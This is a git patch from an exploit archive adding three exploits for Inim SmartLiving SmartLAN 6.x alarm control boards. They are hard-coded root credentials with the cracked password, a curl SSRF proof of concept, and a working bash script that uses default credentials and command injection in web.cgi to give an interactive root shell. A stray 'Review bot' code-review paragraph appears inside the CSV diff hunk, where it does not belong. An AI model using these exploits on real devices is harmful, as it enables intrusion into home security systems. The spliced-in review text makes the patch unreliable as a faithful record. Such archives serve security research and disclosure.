From 09d5da74fb60ba78fdc956336456eb7be8b453e0 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 11 Dec 2019 05:01:56 +0000
Subject: [PATCH] DB: 2019-12-11

3 changes to exploits/shellcodes

Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials
Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery
Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
---
 exploits/hardware/local/47763.txt | 79 ++++++++++++
 exploits/hardware/webapps/47764.txt | 72 +++++++++++
 exploits/hardware/webapps/47765.txt | 192 ++++++++++++++++++++++++++++
 files_exploits.csv | 3 +
 4 files changed, 346 insertions(+)
 create mode 100644 exploits/hardware/local/47763.txt
 create mode 100644 exploits/hardware/webapps/47764.txt
 create mode 100644 exploits/hardware/webapps/47765.txt

diff --git a/exploits/hardware/local/47763.txt b/exploits/hardware/local/47763.txt
new file mode 100644
index 000000000..0b5ae452a
--- /dev/null
+++ b/exploits/hardware/local/47763.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials
+# Exploit Author: LiquidWorm
+# Date: 2019-12-09
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Advisory ID: ZSL-2019-5546
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
+
+Inim Electronics Smartliving SmartLAN/G/SI <=6.x Hard-coded Credentials
+
+
+Vendor: INIM Electronics s.r.l.
+Product web page: https://www.inim.biz
+Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+Affected version: <=6.x
+Affected models: SmartLiving 505
+ SmartLiving 515
+ SmartLiving 1050, SmartLiving 1050/G3
+ SmartLiving 10100L, SmartLiving10100L/G3
+
+Summary: SmartLiving anti-intrusion control panel and security system provides
+important features rarely found in residential, commercial or industrial application
+systems of its kind. This optimized-performance control panel provides first-rate
+features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
+end-to-end voice transmission (voice-on-bus), IP connectivity.
+
+SMARTLAN/SI:
+The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
+networking capability and fast connectivity to the Internet. Therefore, it is possible
+to set up a remote connection and program or control the system via the SmartLeague
+software application. In effect, the SmartLAN/SI board grants the same level of access
+to the system as a local RS232 connection.
+
+SMARTLAN/G:
+The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
+advanced remote-access and communication functions. The SmartLAN/G board is capable of
+sending event-related e-mails automatically. Each e-mail can be associated with a subject,
+an attachment and a text message. The attachment can be of any kind and is saved to an
+SD card. The message text can contain direct links to domains or IP addressable devices,
+such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
+global access to their control panels via any Internet browser accessed through a PC,
+PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
+distinguishing the means of connection and as a result provides an appropriate web-page
+for the tool in use. Smartphones can control the system in much the same way as a
+household keypad, from inside the house or from any part of the world.
+
+Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
+These sets of credentials (Telnet, SSH, FTP) are never exposed to the end-user and cannot
+be changed through any normal operation of the smart home device. Attacker could exploit
+this vulnerability by logging in and gain system access.
+
+Tested on: GNU/Linux 3.2.1 armv5tejl
+ Boa/0.94.14rc21
+ BusyBox v1.20.2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5546
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
+
+
+06.09.2019
+
+--
+
+
+# cat /etc/passwd
+root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:administrator:/:/bin/sh
+nobody:*:254:254:nobody:/var/empty:/bin/sh
+logout:gfr8cijmRSDck:498:506:logout:/:
+
+# john --show /etc/passwd
+root:pass:0:0:administrator:/:/bin/sh
+logout:logout:498:506:logout:/:
+
+2 password hashes cracked, 0 left
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47764.txt b/exploits/hardware/webapps/47764.txt
new file mode 100644
index 000000000..6185243b3
--- /dev/null
+++ b/exploits/hardware/webapps/47764.txt
@@ -0,0 +1,72 @@
+# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery
+# Author: LiquidWorm
+# Date: 2019-12-09
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Version: 6.x
+# Advisory ID: ZSL-2019-5545
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
+
+Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF
+
+
+Vendor: INIM Electronics s.r.l.
+Product web page: https://www.inim.biz
+Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+Affected version: <=6.x
+Affected models: SmartLiving 505
+ SmartLiving 515
+ SmartLiving 1050, SmartLiving 1050/G3
+ SmartLiving 10100L, SmartLiving10100L/G3
+
+Summary: SmartLiving anti-intrusion control panel and security system provides
+important features rarely found in residential, commercial or industrial application
+systems of its kind. This optimized-performance control panel provides first-rate
+features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
+end-to-end voice transmission (voice-on-bus), IP connectivity.
+
+SMARTLAN/SI:
+The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
+networking capability and fast connectivity to the Internet. Therefore, it is possible
+to set up a remote connection and program or control the system via the SmartLeague
+software application. In effect, the SmartLAN/SI board grants the same level of access
+to the system as a local RS232 connection.
+
+SMARTLAN/G:
+The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
+advanced remote-access and communication functions. The SmartLAN/G board is capable of
+sending event-related e-mails automatically. Each e-mail can be associated with a subject,
+an attachment and a text message. The attachment can be of any kind and is saved to an
+SD card. The message text can contain direct links to domains or IP addressable devices,
+such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
+global access to their control panels via any Internet browser accessed through a PC,
+PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
+distinguishing the means of connection and as a result provides an appropriate web-page
+for the tool in use. Smartphones can control the system in much the same way as a
+household keypad, from inside the house or from any part of the world.
+
+Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the
+SmartLiving SmartLAN within the GetImage functionality. The application parses user
+supplied data in the GET parameter 'host' to construct an image request to the service
+through onvif.cgi. Since no validation is carried out on the parameter, an attacker
+can specify an external domain and force the application to make an HTTP request to
+an arbitrary destination host. This can be used by an external attacker for example
+to bypass firewalls and initiate a service and network enumeration on the internal
+network through the affected application.
+
+Tested on: GNU/Linux 3.2.1 armv5tejl
+ Boa/0.94.14rc21
+ BusyBox v1.20.2
+
+
+Vulnerability discovered by Sipke Mellema
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5545
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
+
+
+PoC:
+
+curl http://192.168.1.17/cgi-bin/onvif.cgi -X POST -d"mod=GetImage&host=http://127.0.0.1:23&par=2"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47765.txt b/exploits/hardware/webapps/47765.txt
new file mode 100644
index 000000000..98b8401f4
--- /dev/null
+++ b/exploits/hardware/webapps/47765.txt
@@ -0,0 +1,192 @@
+# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
+# Author: LiquidWorm
+# Date: 2019-12-09
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Version: 6.x
+# Advisory ID: ZSL-2019-5545
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
+
+#!/bin/bash
+#
+#
+# Inim Electronics SmartLiving SmartLAN/G/SI <=6.x Root Remote Command Execution
+#
+#
+# Vendor: INIM Electronics s.r.l.
+# Product web page: https://www.inim.biz
+# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
+# Affected version: <=6.x
+# Affected models: SmartLiving 505
+# SmartLiving 515
+# SmartLiving 1050, SmartLiving 1050/G3
+# SmartLiving 10100L, SmartLiving10100L/G3
+#
+# Summary: SmartLiving anti-intrusion control panel and security system provides
+# important features rarely found in residential, commercial or industrial application
+# systems of its kind. This optimized-performance control panel provides first-rate
+# features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
+# end-to-end voice transmission (voice-on-bus), IP connectivity.
+#
+# SMARTLAN/SI:
+# The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
+# networking capability and fast connectivity to the Internet. Therefore, it is possible
+# to set up a remote connection and program or control the system via the SmartLeague
+# software application. In effect, the SmartLAN/SI board grants the same level of access
+# to the system as a local RS232 connection.
+#
+# SMARTLAN/G:
+# The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
+# advanced remote-access and communication functions. The SmartLAN/G board is capable of
+# sending event-related e-mails automatically. Each e-mail can be associated with a subject,
+# an attachment and a text message. The attachment can be of any kind and is saved to an
+# SD card. The message text can contain direct links to domains or IP addressable devices,
+# such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
+# global access to their control panels via any Internet browser accessed through a PC,
+# PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
+# distinguishing the means of connection and as a result provides an appropriate web-page
+# for the tool in use. Smartphones can control the system in much the same way as a
+# household keypad, from inside the house or from any part of the world.
+#
+# Desc: SmartLiving SmartLAN suffers from an authenticated remote command injection vulnerability.
+# The issue exist due to the 'par' POST parameter not being sanitized when called with
+# the 'testemail' module through web.cgi binary. The vulnerable CGI binary (ELF 32-bit
+# LSB executable, ARM) is calling the 'sh' executable via the system() function to issue
+# a command using the mailx service and its vulnerable string format parameter allowing
+# for OS command injection with root privileges. An attacker can remotely execute system
+# commands as the root user using default credentials and bypass access controls in place.
+#
+# ================= dissassembly of vuln function =================
+#
+#[0x0000c86c]> pd @ 0x000c86c
+#| ;-- pc:
+#| ;-- r15:
+#| 0x0000c86c ldr r1, str.testemail ; [0xed96:4]=0x74736574 ; "testemail" ; const char * s2
+#| 0x0000c870 bl sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)
+#| 0x0000c874 cmp r0, 0
+#| 0x0000c878 bne 0xc8b8
+#| 0x0000c87c cmp sl, 0
+#| 0x0000c880 beq 0xd148
+#| 0x0000c884 bl sym.set_no_cache
+#| 0x0000c888 add r5, sp, 0x20
+#| 0x0000c88c mov r0, r4
+#| 0x0000c890 ldr r1, str.application_json ; [0xeda0:4]=0x6c707061 ; "application/json"
+#| 0x0000c894 bl sym.imp.qcgires_setcontenttype
+#| 0x0000c898 mov r0, r5 ; char *s
+#| 0x0000c89c mov r1, 0xc8 ; 200 ; size_t
+#| 0x0000c8a0 ldr r2, str.echo__Hello_____mailx__s__Email_test___s ; [0xedb1:4]=0x6f686365 ; "echo \"Hello!\" | mailx -s \"Email test\" %s" ; con
+#| 0x0000c8a4 mov r3, r8 ; ...
+#| 0x0000c8a8 bl sym.imp.snprintf ; int snprintf(char *s,
+#| 0x0000c8ac mov r0, r5 ; const char * string
+#| 0x0000c8b0 bl sym.imp.system ; int system(const char *string)
+#| 0x0000c8b4 b 0xd134
+#|
+#| system() @0x0000c8b0 arguments: "sh -c echo "Hello!" | mailx -s "Email test" %s"
+#| Trigger suggest: $(curl -sik http://192.168.1.17/cgi-bin/web.cgi -X POST --data "mod=testemail&par=;/sbin/ifconfig" --cookie "user=admin;pass=pass;code=9999")
+#| Process: 1351 root 0:00 sh -c echo "Hello!" | mailx -s "Emaiil test" ;/sbin/ifconfig
+#|__
+# =================================================================
+#
+# -----------------------------------------------------------------
+#
+# root@kali:~# ./xpl.sh https://192.168.1.17
+#
+# Checking target: https://192.168.1.17
+# ACCESS GRANTED!
+#
+# root@ssl> id; uname -a; getconf LONG_BIT; cat ../version.html; pwd
+# uid=0(root) gid=0(root) groups=0(root),10(wheel)
+# Linux SmartLAN 3.2.1 #195 PREEMPT Thu May 30 15:26:27 CEST 2013 armv5tejl GNU/Linux
+# 32
+#
+#

+# SmartLiving 6.07 10100 +#

SmartLAN/G v. 6.11
+# /www/cgi-bin
+# root@ssl> exit
+# root@kali:~/#
+#
+# -----------------------------------------------------------------
+#
+# Tested on: GNU/Linux 3.2.1 armv5tejl
+# Boa/0.94.14rc21
+# BusyBox v1.20.2
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5544
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5544.php
+#
+#
+# 06.09.2019
+#
+
+URL=$1
+CGI="/cgi-bin/web.cgi"
+COOK="user=admin;pass=pass;code=9999"
+COOK1="user=admin;pass=pass;code=9998"
+COOK2="user=user;pass=pass;code=0001"
+PARAMS="mod=testemail&par=;"
+CHECK=${URL:4:1}
+
+if [ "$#" -ne 1 ]; then
+ echo -en "\e[34m"
+ echo "==============================================="
+ echo " SmartLiving SmartLAN 6.x Remote Root Exploit"
+ echo -e "\t\tZSL-2019-5544"
+ echo "==============================================="
+ echo -en "\e[00m"
+ echo -e "\nUsage: $0 http(s)://ip:port\n"
+ exit 0
+fi
+
+echo -ne "\nChecking target: $URL\n"
+
+if [ "$CHECK" == "s" ]; then
+ TEST=$(curl -sIk $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
+ if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
+ echo "HTTPS with error!"
+ exit 0
+ fi
+ if curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
+ then
+ echo -e "ACCESS GRANTED!\n"
+ else
+ echo "Invalid credentials."
+ exit 0
+ fi
+ while true; do
+ R="$(tput sgr0)"
+ S="$(tput setaf 2)"
+ read -rp "${S}root@ssl>${R} " CMD
+ if [[ "$CMD" == "exit" ]]; then
+ exit 0
+ fi
+ curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5
+ done
+else
+ TEST=$(curl -sI $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
+ if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
+ echo "HTTP with error!"
+ exit 0
+ fi
+ if curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
+ then
+ echo -e "ACCESS GRANTED!\n"
+ else
+ echo "Invalid credentials."
+ exit 0
+ fi
+ while true; do
+ R="$(tput sgr0)"
+ S="$(tput setaf 2)"
+ read -rp "${S}root@http>${R} " CMD
+ if [[ "$CMD" == "exit" ]]; then
+ exit 0
+ fi
+ curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5
+ done
+fi
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ff09127ae..6b6e82a1f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10834,6 +10834,7 @@ id,file,description,date,author,type,platform,port
 47754,exploits/windows/local/47754.py,"Microsoft Windows - 'WSReset' UAC Protection Bypass (Registry)",2019-09-02,valen,local,windows,
 47755,exploits/windows/local/47755.c,"Microsoft Windows 10 - 'WSReset' UAC Protection Bypass (propsys.dll)",2019-09-20,valen,local,windows,
 47759,exploits/windows/local/47759.py,"SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)",2019-12-09,"Kirill Nikolaev",local,windows,
+47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
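Review bot: The advisory ID in the file header of 47765.txt disagrees with the advisory the script itself cites: the header gives `# Advisory ID: ZSL-2019-5545` and the matching URL, which is the ID the SSRF advisory in 47764.txt uses, while the script's banner, its usage text (`ZSL-2019-5544`) and its own advisory block all name ZSL-2019-5544. The header lines should read `# Advisory ID: ZSL-2019-5544` and `# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5544.php`, since readers cross-referencing the advisory from the files_exploits.csv row rely on them. Separately, the `[[ "$?" = "7" ]]` tests that follow the `TEST=$(curl … | head -1 | awk …)` assignments are dead: `$?` there is the exit status of the pipeline's last command, awk, so that branch only ever fires through the `$TEST != "200"` comparison; a short comment saying so, or dropping the redundant test, would make the intent clearer. `COOK1` and `COOK2` are assigned but never used and look like leftovers.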
@@ -42072,3 +42073,5 @@ id,file,description,date,author,type,platform,port
 47760,exploits/hardware/webapps/47760.py,"Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution",2019-12-09,Hodorsec,webapps,hardware,
 47761,exploits/php/webapps/47761.py,"Alcatel-Lucent Omnivista 8770 - Remote Code Execution",2019-12-09,0x1911,webapps,php,
 47762,exploits/java/webapps/47762.txt,"Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting",2019-12-09,omurugur,webapps,java,
+47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
+47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,